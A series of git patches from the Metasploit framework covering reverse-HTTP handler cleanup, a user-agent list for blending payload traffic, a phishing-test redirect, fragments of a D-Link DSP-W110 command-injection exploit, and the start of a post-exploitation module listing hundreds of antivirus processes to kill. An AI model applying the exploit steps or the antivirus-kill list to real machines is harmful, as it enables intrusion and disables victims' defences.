+        OptString.new('HttpUnknownRequestResponse', [false, 'The returned HTML response body when the handler receives a request that is not from a payload', '<html><body><h1>It works!</h1></body></html>']),
         OptBool.new('IgnoreUnknownPayloads', [false, 'Whether to drop connections from payloads using unknown UUIDs', false])
       ], Msf::Handler::ReverseHttp)
   end
@@ -64,7 +65,7 @@ module ReverseHttp
   #
   # @return [String]
   def listener_address
-    if datastore['ReverseListenerBindAddress'].to_s == ""
+    if datastore['ReverseListenerBindAddress'].to_s == ''
       bindaddr = Rex::Socket.is_ipv6?(datastore['LHOST']) ? '::' : '0.0.0.0'
     else
       bindaddr = datastore['ReverseListenerBindAddress']
@@ -101,7 +102,7 @@ module ReverseHttp
   # Use the {#refname} to determine whether this handler uses SSL or not
   #
   def ssl?
-    !!(self.refname.index("https"))
+    !!(self.refname.index('https'))
   end
 
   # URI scheme
@@ -109,7 +110,7 @@ module ReverseHttp
   # @return [String] One of "http" or "https" depending on whether we
   #   are using SSL
   def scheme
-    (ssl?) ? "https" : "http"
+    (ssl?) ? 'https' : 'http'
   end
 
   # Create an HTTP listener
@@ -117,7 +118,7 @@ module ReverseHttp
   def setup_handler
 
     comm = datastore['ReverseListenerComm']
-    if (comm.to_s == "local")
+    if (comm.to_s == 'local')
       comm = ::Rex::Socket::Comm::Local
     else
       comm = nil
@@ -136,7 +137,7 @@ module ReverseHttp
         'MsfExploit' => self,
       },
       comm,
-      (ssl?) ? datastore["HandlerSSLCert"] : nil
+      (ssl?) ? datastore['HandlerSSLCert'] : nil
     )
 
     self.service.server_name = datastore['MeterpreterServerName']
@@ -165,7 +166,7 @@ module ReverseHttp
   #
   def stop_handler
     if self.service
-      self.service.remove_resource("/")
+      self.service.remove_resource('/')
       if self.service.resources.empty? && self.sessions == 0
         Rex::ServiceManager.stop_service(self.service)
       end
@@ -183,7 +184,7 @@ protected
     info = {}
     return @proxy_settings if @proxy_settings
 
-    if datastore['PayloadProxyHost'].to_s == ""
+    if datastore['PayloadProxyHost'].to_s == ''
       @proxy_settings = info
       return @proxy_settings
     end
@@ -204,10 +205,10 @@ protected
       info[:info] = "socks=#{info[:info]}"
     else
       info[:info] = "http://#{info[:info]}"
-      if datastore['PayloadProxyUser'].to_s != ""
+      if datastore['PayloadProxyUser'].to_s != ''
         info[:username] = datastore['PayloadProxyUser'].to_s
       end
-      if datastore['PayloadProxyPass'].to_s != ""
+      if datastore['PayloadProxyPass'].to_s != ''
         info[:password] = datastore['PayloadProxyPass'].to_s
       end
     end
@@ -359,7 +360,7 @@ protected
       when :connect
         print_status("#{cli.peerhost}:#{cli.peerport} (UUID: #{uuid.to_s}) Attaching orphaned/stageless session ...")
 
-        resp.body = ""
+        resp.body = ''
         conn_id = req.relative_resource
 
         # Short-circuit the payload's handle_connection processing for create_session
@@ -367,13 +368,10 @@ protected
           :passive_dispatcher => obj.service,
           :conn_id            => conn_id,
           :url                => payload_uri(req) + conn_id + "/\x00",
-          # TODO ### Figure out what to do with these options given that the payload ###
-          # settings might not match the handler, should we instead read the remote?   #
-          :expiration         => datastore['SessionExpirationTimeout'].to_i,           #
-          :comm_timeout       => datastore['SessionCommunicationTimeout'].to_i,        #
-          :retry_total        => datastore['SessionRetryTotal'].to_i,                  #
-          :retry_wait         => datastore['SessionRetryWait'].to_i,                   #
-          ##############################################################################
+          :expiration         => datastore['SessionExpirationTimeout'].to_i,
+          :comm_timeout       => datastore['SessionCommunicationTimeout'].to_i,
+          :retry_total        => datastore['SessionRetryTotal'].to_i,
+          :retry_wait         => datastore['SessionRetryWait'].to_i,
           :ssl                => ssl?,
           :payload_uuid       => uuid
         })
@@ -383,7 +381,7 @@ protected
           print_status("#{cli.peerhost}:#{cli.peerport} Unknown request to #{req.relative_resource} with UA #{req.headers['User-Agent']}...")
         end
         resp.code    = 200
-        resp.message = "OK"
+        resp.message = 'OK'
         resp.body    = datastore['HttpUnknownRequestResponse'].to_s
         self.pending_connections -= 1
     end
diff --git a/lib/rex/user_agent.rb b/lib/rex/user_agent.rb
new file mode 100644
index 0000000000..9e67b0438a
--- /dev/null
+++ b/lib/rex/user_agent.rb
@@ -0,0 +1,118 @@
+# -*- coding: binary -*-
+
+#
+# A helper module for using and referencing comming user agent strings.
+#
+module Rex::UserAgent
+
+  #
+  # List from https://techblog.willshouse.com/2012/01/03/most-common-user-agents/
+  # This article was updated on July 11th 2015. It's probably worth updating this
+  # list over time.
+  #
+  # This list is in the order of most common to least common.
+  #
+  COMMON_AGENTS = [
+    'Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/43.0.2357.130 Safari/537.36',
+    'Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/43.0.2357.124 Safari/537.36',
+    'Mozilla/5.0 (Windows NT 6.1; WOW64; rv:38.0) Gecko/20100101 Firefox/38.0',
+    'Mozilla/5.0 (Macintosh; Intel Mac OS X 10_10_3) AppleWebKit/600.6.3 (KHTML, like Gecko) Version/8.0.6 Safari/600.6.3',
+    'Mozilla/5.0 (Macintosh; Intel Mac OS X 10_10_3) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/43.0.2357.124 Safari/537.36',
+    'Mozilla/5.0 (Windows NT 6.3; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/43.0.2357.130 Safari/537.36',
+    'Mozilla/5.0 (Windows NT 6.3; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/43.0.2357.124 Safari/537.36',
+    'Mozilla/5.0 (Macintosh; Intel Mac OS X 10_10_3) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/43.0.2357.130 Safari/537.36',
+    'Mozilla/5.0 (Windows NT 6.3; WOW64; rv:38.0) Gecko/20100101 Firefox/38.0',
+    'Mozilla/5.0 (Macintosh; Intel Mac OS X 10.10; rv:38.0) Gecko/20100101 Firefox/38.0',
+    'Mozilla/5.0 (Windows NT 6.1; WOW64; Trident/7.0; rv:11.0) like Gecko',
+    'Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:38.0) Gecko/20100101 Firefox/38.0',
+    'Mozilla/5.0 (Macintosh; Intel Mac OS X 10_10_4) AppleWebKit/600.7.12 (KHTML, like Gecko) Version/8.0.7 Safari/600.7.12',
+    'Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/43.0.2357.132 Safari/537.36',
+    'Mozilla/5.0 (Windows NT 6.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/43.0.2357.130 Safari/537.36',
+    'Mozilla/5.0 (Macintosh; Intel Mac OS X 10_10_4) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/43.0.2357.130 Safari/537.36',
+    'Mozilla/5.0 (Windows NT 6.1; WOW64; rv:39.0) Gecko/20100101 Firefox/39.0',
+    'Mozilla/5.0 (Windows NT 6.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/43.0.2357.124 Safari/537.36',
+    'Mozilla/5.0 (Macintosh; Intel Mac OS X 10_9_5) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/43.0.2357.130 Safari/537.36',
+    'Mozilla/5.0 (Windows NT 6.3; WOW64; Trident/7.0; rv:11.0) like Gecko',
+    'Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/43.0.2357.125 Safari/537.36',
+    'Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/43.0.2357.130 Safari/537.36',
+    'Mozilla/5.0 (Windows NT 6.3; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/43.0.2357.132 Safari/537.36',
+    'Mozilla/5.0 (Macintosh; Intel Mac OS X 10_10_3) AppleWebKit/600.5.17 (KHTML, like Gecko) Version/8.0.5 Safari/600.5.17',
+    'Mozilla/5.0 (Windows NT 6.1; rv:38.0) Gecko/20100101 Firefox/38.0',
+    'Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/43.0.2357.81 Safari/537.36',
+    'Mozilla/5.0 (Macintosh; Intel Mac OS X 10_10_3) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/43.0.2357.81 Safari/537.36',
+    'Mozilla/5.0 (Macintosh; Intel Mac OS X 10_9_5) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/43.0.2357.124 Safari/537.36',
+    'Mozilla/5.0 (Macintosh; Intel Mac OS X 10_9_5) AppleWebKit/600.6.3 (KHTML, like Gecko) Version/7.1.6 Safari/537.85.15',
+    'Mozilla/5.0 (iPad; CPU OS 8_3 like Mac OS X) AppleWebKit/600.1.4 (KHTML, like Gecko) Version/8.0 Mobile/12F69 Safari/600.1.4',
+    'Mozilla/5.0 (Windows NT 6.1; Trident/7.0; rv:11.0) like Gecko',
+    'Mozilla/5.0 (Windows NT 6.3; WOW64; rv:39.0) Gecko/20100101 Firefox/39.0',
+    'Mozilla/5.0 (X11; Linux x86_64; rv:38.0) Gecko/20100101 Firefox/38.0',
+    'Mozilla/5.0 (Macintosh; Intel Mac OS X 10_10_2) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/43.0.2357.130 Safari/537.36',
+    'Mozilla/5.0 (iPhone; CPU iPhone OS 8_3 like Mac OS X) AppleWebKit/600.1.4 (KHTML, like Gecko) Version/8.0 Mobile/12F70 Safari/600.1.4',
+    'Mozilla/5.0 (Macintosh; Intel Mac OS X 10_10_3) AppleWebKit/600.5.17 (KHTML, like Gecko) Version/8.0.6 Safari/600.6.3',
+    'Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Ubuntu Chromium/43.0.2357.81 Chrome/43.0.2357.81 Safari/537.36',
+    'Mozilla/5.0 (Macintosh; Intel Mac OS X 10_10_4) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/43.0.2357.132 Safari/537.36',
+    'Mozilla/5.0 (Macintosh; Intel Mac OS X 10.9; rv:38.0) Gecko/20100101 Firefox/38.0',
+    'Mozilla/5.0 (Macintosh; Intel Mac OS X 10_10_2) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/43.0.2357.124 Safari/537.36',
+    'Mozilla/5.0 (Macintosh; Intel Mac OS X 10.10; rv:39.0) Gecko/20100101 Firefox/39.0',
+    'Mozilla/5.0 (Macintosh; Intel Mac OS X 10_10_3) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/43.0.2357.132 Safari/537.36',
+    'Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/43.0.2357.81 Safari/537.36',
+    'Mozilla/5.0 (Windows NT 5.1; rv:38.0) Gecko/20100101 Firefox/38.0',
+    'Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; WOW64; Trident/5.0)',
+    'Mozilla/5.0 (Windows NT 6.1; rv:39.0) Gecko/20100101 Firefox/39.0',
+    'Mozilla/5.0 (compatible; MSIE 10.0; Windows NT 6.1; WOW64; Trident/6.0)',
+    'Mozilla/5.0 (Windows NT 6.2; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/43.0.2357.130 Safari/537.36',
+    'Mozilla/5.0 (Windows NT 6.2; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/43.0.2357.124 Safari/537.36',
+    'Mozilla/5.0 (Windows NT 6.3; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/43.0.2357.81 Safari/537.36',
+    'Mozilla/5.0 (Macintosh; Intel Mac OS X 10_10_2) AppleWebKit/600.4.10 (KHTML, like Gecko) Version/8.0.4 Safari/600.4.10',
+    'Mozilla/5.0 (Macintosh; Intel Mac OS X 10_10_4) AppleWebKit/600.7.11 (KHTML, like Gecko) Version/8.0.7 Safari/600.7.11',
+    'Mozilla/5.0 (Macintosh; Intel Mac OS X 10_7_5) AppleWebKit/537.78.2 (KHTML, like Gecko) Version/6.1.6 Safari/537.78.2',
+    'Mozilla/5.0 (Windows NT 6.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/43.0.2357.132 Safari/537.36',
+    'Mozilla/5.0 (X11; Ubuntu; Linux i686; rv:38.0) Gecko/20100101 Firefox/38.0',
+    'Mozilla/5.0 (Macintosh; Intel Mac OS X 10_10_2) AppleWebKit/600.3.18 (KHTML, like Gecko) Version/8.0.3 Safari/600.3.18',
+    'Mozilla/5.0 (Windows NT 6.1; WOW64; rv:31.0) Gecko/20100101 Firefox/31.0',
+    'Mozilla/5.0 (Windows NT 6.1; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/43.0.2357.124 Safari/537.36',
+    'Mozilla/5.0 (X11; Fedora; Linux x86_64; rv:38.0) Gecko/20100101 Firefox/38.0',
+    'Mozilla/5.0 (Macintosh; Intel Mac OS X 10.7; rv:38.0) Gecko/20100101 Firefox/38.0',
+    'Mozilla/5.0 (Macintosh; Intel Mac OS X 10_6_8) AppleWebKit/534.59.10 (KHTML, like Gecko) Version/5.1.9 Safari/534.59.10',
+    'Mozilla/5.0 (Windows NT 6.2; WOW64; rv:38.0) Gecko/20100101 Firefox/38.0',
+    'Mozilla/5.0 (Macintosh; Intel Mac OS X 10.6; rv:38.0) Gecko/20100101 Firefox/38.0',
+    'Mozilla/5.0 (Macintosh; Intel Mac OS X 10_9_5) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/43.0.2357.81 Safari/537.36',
+    'Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/42.0.2311.135 Safari/537.36',
+    'Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/42.0.2311.152 Safari/537.36',
+    'Mozilla/5.0 (X11; Linux x86_64; rv:31.0) Gecko/20100101 Firefox/31.0',
+    'Mozilla/5.0 (Macintosh; Intel Mac OS X 10.8; rv:38.0) Gecko/20100101 Firefox/38.0',
+    'Mozilla/5.0 (Macintosh; Intel Mac OS X 10_10_0) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/43.0.2357.130 Safari/537.36',
+    'Mozilla/5.0 (X11; Linux x86_64; rv:31.0) Gecko/20100101 Firefox/31.0 Iceweasel/31.7.0',
+    'Mozilla/5.0 (iPad; CPU OS 8_4 like Mac OS X) AppleWebKit/600.1.4 (KHTML, like Gecko) Version/8.0 Mobile/12H143 Safari/600.1.4',
+    'Mozilla/5.0 (Macintosh; Intel Mac OS X 10_10_1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/43.0.2357.124 Safari/537.36',
+    'Mozilla/5.0 (Windows NT 6.3; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/43.0.2357.130 Safari/537.36',
+    'Mozilla/5.0 (Macintosh; Intel Mac OS X 10_9_5) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/43.0.2357.132 Safari/537.36',
+    'Mozilla/5.0 (Macintosh; Intel Mac OS X 10_9_5) AppleWebKit/600.7.12 (KHTML, like Gecko) Version/7.1.7 Safari/537.85.16',
+    'Mozilla/5.0 (Windows NT 6.1; rv:31.0) Gecko/20100101 Firefox/31.0',
+    'Mozilla/5.0 (Windows NT 6.1; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/43.0.2357.130 Safari/537.36',
+    'Mozilla/5.0 (Windows NT 6.1; WOW64; rv:37.0) Gecko/20100101 Firefox/37.0',
+  ]
+
+  #
+  # Pick a random agent from the common agent list.
+  #
+  def self.random
+    COMMON_AGENTS.sample
+  end
+
+  #
+  # Choose the agent with the shortest string (for use in payloads)
+  #
+  def self.shortest
+    @@shortest_agent ||= COMMON_AGENTS.min { |a, b| a.size <=> b.size }
+  end
+
+  #
+  # Choose the most frequent user agent
+  #
+  def self.most_common
+    COMMON_AGENTS[0]
+  end
+
+end
+
diff --git a/modules/payloads/stagers/python/reverse_http.rb b/modules/payloads/stagers/python/reverse_http.rb
index 99d168008b..1157fb49f0 100644
--- a/modules/payloads/stagers/python/reverse_http.rb
+++ b/modules/payloads/stagers/python/reverse_http.rb
@@ -8,7 +8,7 @@ require 'msf/core/handler/reverse_http'
 
 module Metasploit3
 
-  CachedSize = 446
+  CachedSize = 466
 
   include Msf::Payload::Stager
 
diff --git a/modules/payloads/stagers/python/reverse_https.rb b/modules/payloads/stagers/python/reverse_https.rb
index cc8d012738..5da0a623d7 100644
--- a/modules/payloads/stagers/python/reverse_https.rb
+++ b/modules/payloads/stagers/python/reverse_https.rb
@@ -9,7 +9,7 @@ require 'msf/core/payload/uuid/options'
 
 module Metasploit3
 
-  CachedSize = 742
+  CachedSize = 762
 
   include Msf::Payload::Stager
   include Msf::Payload::UUID::Options

From b127fdc4f5351357aed733fda98fd996b8ec0943 Mon Sep 17 00:00:00 2001
From: wchen-r7 <wei_chen@rapid7.com>
Date: Tue, 14 Jul 2015 22:32:40 -0500
Subject: [PATCH 0788/1013] rickrolling is important

---
 scripts/resource/bap_dryrun_only.rc | 4 ++--
 1 file changed, 2 insertions(+), 2 deletions(-)

diff --git a/scripts/resource/bap_dryrun_only.rc b/scripts/resource/bap_dryrun_only.rc
index a8e6299d81..9689d60d65 100644
--- a/scripts/resource/bap_dryrun_only.rc
+++ b/scripts/resource/bap_dryrun_only.rc
@@ -8,9 +8,9 @@ run_single("set MaxSessionCount 0")
 
 # Instead of set Content, you can also do set Custom404 to redirect the client to an SE training website
 # For example (why don't you try this? :-) )
-# run_single("set Custom404 https://www.youtube.com/watch?v=dQw4w9WgXcQ")
+run_single("set Custom404 https://www.youtube.com/watch?v=dQw4w9WgXcQ")
 
-run_single("set HTMLContent \"Hello, this is a security test. You shouldn't have clicked on that link :-)\"")
+# run_single("set HTMLContent \"Hello, this is a security test. You shouldn't have clicked on that link :-)\"")
 
 run_single("run")
 </ruby>

From 21375edcb2fe5bbf8efe0b116134f0b56f082fba Mon Sep 17 00:00:00 2001
From: Christian Mehlmauer <firefart@gmail.com>
Date: Wed, 15 Jul 2015 11:21:39 +0200
Subject: [PATCH 0789/1013] final cleanup

---
 .../http/dlink_dspw110_cookie_noauth_exec.rb  | 20 +++++++++----------
 1 file changed, 10 insertions(+), 10 deletions(-)

diff --git a/modules/exploits/linux/http/dlink_dspw110_cookie_noauth_exec.rb b/modules/exploits/linux/http/dlink_dspw110_cookie_noauth_exec.rb
index a63be7dca8..66ea232ee9 100644
--- a/modules/exploits/linux/http/dlink_dspw110_cookie_noauth_exec.rb
+++ b/modules/exploits/linux/http/dlink_dspw110_cookie_noauth_exec.rb
@@ -23,7 +23,7 @@ class Metasploit3 < Msf::Exploit::Remote
       'Author'         =>
         [
           'Peter Adkins <peter.adkins[at]kernelpicnic.net>', # vulnerability discovery and initial PoC
-          'Michael Messner <devnull[at]s3cur1ty.de>', # Metasploit module
+          'Michael Messner <devnull[at]s3cur1ty.de>' # Metasploit module
         ],
       'License'        => MSF_LICENSE,
       'Platform'       => 'linux',
@@ -49,7 +49,7 @@ class Metasploit3 < Msf::Exploit::Remote
               'Platform' => 'linux',
               'Arch'     => ARCH_MIPSBE
             }
-          ],
+          ]
         ],
       'DefaultTarget'    => 1
       ))
@@ -59,7 +59,7 @@ class Metasploit3 < Msf::Exploit::Remote
     begin
       res = send_request_cgi({
         'uri'    => '/',
-        'method' => 'GET',
+        'method' => 'GET'
       })
 
       if res && res.headers["Server"] =~ /lighttpd\/1\.4\.34/
@@ -83,14 +83,14 @@ class Metasploit3 < Msf::Exploit::Remote
     @counter = 1
     execute_cmdstager(
       :flavor  => :echo,
-      :linemax => 95  #limited by our upload, larger payloads crash the web server
+      :linemax => 95  # limited by our upload, larger payloads crash the web server
     )
 
     print_status("#{peer} - creating payload and executing it ...")
 
     (1 .. @counter).each do |act_file|
-      #the http server blocks access to our files ... we copy it to a new one
-      #the length of our command is restricted to 19 characters
+      # the http server blocks access to our files ... we copy it to a new one
+      # the length of our command is restricted to 19 characters
       cmd = "cp /t*/#{act_file} /tmp/#{act_file+@counter}"
       execute_final_command(cmd)
       cmd = "chmod +x /tmp/#{act_file+@counter}"
@@ -105,8 +105,8 @@ class Metasploit3 < Msf::Exploit::Remote
   end
 
   def execute_command(cmd,opts)
-    #upload our stager to a shell script
-    #upload takes quite long because there is no response from the web server
+    # upload our stager to a shell script
+    # upload takes quite long because there is no response from the web server
 
     file_upload = "#!/bin/sh\n"
     file_upload << cmd << "\n"
@@ -124,7 +124,7 @@ class Metasploit3 < Msf::Exploit::Remote
         'uri'           => "/web_cgi.cgi",
         'vars_get' => {
           '&request' =>'UploadFile',
-          'path' => '/tmp/',
+          'path' => '/tmp/'
         },
         'encode_params' => false,
         'ctype'         => "multipart/form-data; boundary=#{post_data.bound}",
@@ -137,7 +137,7 @@ class Metasploit3 < Msf::Exploit::Remote
   end
 
   def execute_final_command(cmd)
-    #very limited space - larger commands crash the webserver
+    # very limited space - larger commands crash the webserver
     fail_with(Failure::Unknown, "#{peer} - Generated command for injection is too long") if cmd.length > 18
     begin
       send_request_cgi({

From 7520bc9a8a300f8bafe6d065525c1fca30b69141 Mon Sep 17 00:00:00 2001
From: Marc-Andre Meloche <marcandremeloche@gmail.com>
Date: Wed, 15 Jul 2015 14:04:37 -0400
Subject: [PATCH 0790/1013] Exported Killav into a post-exploitation module

I was unsure if this was the place to send the update.
---
 modules/post/windows/manage/killav.rb | 656 ++++++++++++++++++++++++++
 1 file changed, 656 insertions(+)
 create mode 100644 modules/post/windows/manage/killav.rb

diff --git a/modules/post/windows/manage/killav.rb b/modules/post/windows/manage/killav.rb
new file mode 100644
index 0000000000..1ac28e83ee
--- /dev/null
+++ b/modules/post/windows/manage/killav.rb
@@ -0,0 +1,656 @@
+##
+# This module requires Metasploit: http://metasploit.com/download
+# Current source: https://github.com/rapid7/metasploit-framework
+##
+##
+
+require 'msf/core'
+
+class Metasploit3 < Msf::Post
+
+  def initialize(info={})
+    super(update_info(info,
+        'Name'          => 'Windows Post Kill Antivirus and Hips',
+        'Description'   => %q{
+          Converted and merged several post scripts to remove a maximum of av and hips.
+        },
+        'License'       => MSF_LICENSE,
+        'Author'        => [ 'Marc-Andre Meloche (MadmanTM)', 'Nikhil Mittal (Samratashok)', 'Jerome Athias'],
+        'Platform'      => [ 'win' ],
+        'SessionTypes'  => [ 'meterpreter' ]
+    ))
+  end
+
+
+  def run
+avs = %W{
+  firesvc.exe
+  firetray.exe
+  hipsvc.exe
+  mfevtps.exe
+  mcafeefire.exe
+  scan32.exe
+  shstat.exe
+  tbmon.exe
+  vstskmgr.exe
+  engineserver.exe
+  mfevtps.exe
+  mfeann.exe
+  mcscript.exe
+  updaterui.exe
+  udaterui.exe
+  naprdmgr.exe
+  frameworkservice.exe
+  cleanup.exe
+  cmdagent.exe
+  frminst.exe
+  mcscript_inuse.exe
+  mctray.exe
+  mcshield.exe
+  AAWTray.exe
+  Ad-Aware.exe
+  MSASCui.exe
+  _avp32.exe
+  _avpcc.exe
+  _avpm.exe
+  aAvgApi.exe
+  ackwin32.exe
+  adaware.exe
+  advxdwin.exe
+  agentsvr.exe
+  agentw.exe
+  alertsvc.exe
+  alevir.exe
+  alogserv.exe
+  amon9x.exe
+  anti-trojan.exe
+  antivirus.exe
+  ants.exe
+  apimonitor.exe
+  aplica32.exe
+  apvxdwin.exe
+  arr.exe
+  atcon.exe
+  atguard.exe
+  atro55en.exe
+  atupdater.exe
+  atwatch.exe
+  au.exe
+  aupdate.exe
+  auto-protect.nav80try.exe
+  autodown.exe
+  autotrace.exe
+  autoupdate.exe
+  avconsol.exe
+  ave32.exe
+  avgcc32.exe
+  avgctrl.exe
+  avgemc.exe
+  avgnt.exe
+  avgrsx.exe
+  avgserv.exe
+  avgserv9.exe
+  avguard.exe
+  avgw.exe
+  avkpop.exe
+  avkserv.exe
+  avkservice.exe
+  avkwctl9.exe
+  avltmain.exe
+  avnt.exe
+  avp.exe
+  avp.exe
+  avp32.exe
+  avpcc.exe
+  avpdos32.exe
+  avpm.exe
+  avptc32.exe
+  avpupd.exe
+  avsched32.exe
+  avsynmgr.exe
+  avwin.exe
+  avwin95.exe
+  avwinnt.exe
+  avwupd.exe
+  avwupd32.exe
+  avwupsrv.exe
+  avxmonitor9x.exe
+  avxmonitornt.exe
+  avxquar.exe
+  backweb.exe
+  bargains.exe
+  bd_professional.exe
+  beagle.exe
+  belt.exe
+  bidef.exe
+  bidserver.exe
+  bipcp.exe
+  bipcpevalsetup.exe
+  bisp.exe
+  blackd.exe
+  blackice.exe
+  blink.exe
+  blss.exe
+  bootconf.exe
+  bootwarn.exe
+  borg2.exe
+  bpc.exe
+  brasil.exe
+  bs120.exe
+  bundle.exe
+  bvt.exe
+  ccapp.exe
+  ccevtmgr.exe
+  ccpxysvc.exe
+  cdp.exe
+  cfd.exe
+  cfgwiz.exe
+  cfiadmin.exe
+  cfiaudit.exe
+  cfinet.exe
+  cfinet32.exe
+  claw95.exe
+  claw95cf.exe
+  clean.exe
+  cleaner.exe
+  cleaner3.exe
+  cleanpc.exe
+  click.exe
+  cmesys.exe
+  cmgrdian.exe
+  cmon016.exe
+  connectionmonitor.exe
+  cpd.exe
+  cpf9x206.exe
+  cpfnt206.exe
+  ctrl.exe
+  cv.exe
+  cwnb181.exe
+  cwntdwmo.exe
+  datemanager.exe
+  dcomx.exe
+  defalert.exe
+  defscangui.exe
+  defwatch.exe
+  deputy.exe
+  divx.exe
+  dllcache.exe
+  dllreg.exe
+  doors.exe
+  dpf.exe
+  dpfsetup.exe
+  dpps2.exe
+  drwatson.exe
+  drweb32.exe
+  drwebupw.exe
+  dssagent.exe
+  dvp95.exe
+  dvp95_0.exe
+  ecengine.exe
+  efpeadm.exe
+  emsw.exe
+  ent.exe
+  esafe.exe
+  escanhnt.exe
+  escanv95.exe
+  espwatch.exe
+  ethereal.exe
+  etrustcipe.exe
+  evpn.exe
+  exantivirus-cnet.exe
+  exe.avxw.exe
+  expert.exe
+  explore.exe
+  f-agnt95.exe
+  f-prot.exe
+  f-prot95.exe
+  f-stopw.exe
+  fameh32.exe
+  fast.exe
+  fch32.exe
+  fih32.exe
+  findviru.exe
+  firewall.exe
+  fnrb32.exe
+  fp-win.exe
+  fp-win_trial.exe
+  fprot.exe
+  frw.exe
+  fsaa.exe
+  fsav.exe
+  fsav32.exe
+  fsav530stbyb.exe
+  fsav530wtbyb.exe
+  fsav95.exe
+  fsgk32.exe
+  fsm32.exe
+  fsma32.exe
+  fsmb32.exe
+  gator.exe
+  gbmenu.exe
+  gbpoll.exe
+  generics.exe
+  gmt.exe
+  guard.exe
+  guarddog.exe
+  hacktracersetup.exe
+  hbinst.exe
+  hbsrv.exe
+  hotactio.exe
+  hotpatch.exe
+  htlog.exe
+  htpatch.exe
+  hwpe.exe
+  hxdl.exe
+  hxiul.exe
+  iamapp.exe
+  iamserv.exe
+  iamstats.exe
+  ibmasn.exe
+  ibmavsp.exe
+  icload95.exe
+  icloadnt.exe
+  icmon.exe
+  icsupp95.exe
+  icsuppnt.exe
+  idle.exe
+  iedll.exe
+  iedriver.exe
+  iexplorer.exe
+  iface.exe
+  ifw2000.exe
+  inetlnfo.exe
+  infus.exe
+  infwin.exe
+  init.exe
+  intdel.exe
+  intren.exe
+  iomon98.exe
+  istsvc.exe
+  jammer.exe
+  jdbgmrg.exe
+  jedi.exe
+  kavlite40eng.exe
+  kavpers40eng.exe
+  kavpf.exe
+  kazza.exe
+  keenvalue.exe
+  kerio-pf-213-en-win.exe
+  kerio-wrl-421-en-win.exe
+  kerio-wrp-421-en-win.exe
+  kernel32.exe
+  killprocesssetup161.exe
+  launcher.exe
+  ldnetmon.exe
+  ldpro.exe
+  ldpromenu.exe
+  ldscan.exe
+  lnetinfo.exe
+  loader.exe
+  localnet.exe
+  lockdown.exe
+  lockdown2000.exe
+  lookout.exe
+  lordpe.exe
+  lsetup.exe
+  luall.exe
+  luau.exe
+  lucomserver.exe
+  luinit.exe
+  luspt.exe
+  mapisvc32.exe
+  mcagent.exe
+  mcmnhdlr.exe
+  mcshield.exe
+  mctool.exe
+  mcupdate.exe
+  mcvsrte.exe
+  mcvsshld.exe
+  md.exe
+  mfin32.exe
+  mfw2en.exe
+  mfweng3.02d30.exe
+  mgavrtcl.exe
+  mgavrte.exe
+  mghtml.exe
+  mgui.exe
+  minilog.exe
+  mmod.exe
+  monitor.exe
+  moolive.exe
+  mostat.exe
+  mpfagent.exe
+  mpfservice.exe
+  mpftray.exe
+  mrflux.exe
+  msapp.exe
+  msbb.exe
+  msblast.exe
+  mscache.exe
+  msccn32.exe
+  mscman.exe
+  msconfig.exe
+  msdm.exe
+  msdos.exe
+  msiexec16.exe
+  msinfo32.exe
+  mslaugh.exe
+  msmgt.exe
+  msmsgri32.exe
+  mssmmc32.exe
+  mssys.exe
+  msvxd.exe
+  mu0311ad.exe
+  mwatch.exe
+  n32scanw.exe
+  nav.exe
+  navap.navapsvc.exe
+  navapsvc.exe
+  navapw32.exe
+  navdx.exe
+  navlu32.exe
+  navnt.exe
+  navstub.exe
+  navw32.exe
+  navwnt.exe
+  nc2000.exe
+  ncinst4.exe
+  ndd32.exe
+  neomonitor.exe
+  neowatchlog.exe
+  netarmor.exe
+  netd32.exe
+  netinfo.exe
+  netmon.exe
+  netscanpro.exe
+  netspyhunter-1.2.exe
+  netstat.exe
+  netutils.exe
+  nisserv.exe
+  nisum.exe
+  nmain.exe
+  nod32.exe
+  normist.exe
+  norton_internet_secu_3.0_407.exe
+  notstart.exe
+  npf40_tw_98_nt_me_2k.exe
+  npfmessenger.exe
+  nprotect.exe
+  npscheck.exe
+  npssvc.exe
+  nsched32.exe
+  nssys32.exe
+  nstask32.exe
+  nsupdate.exe
+  nt.exe
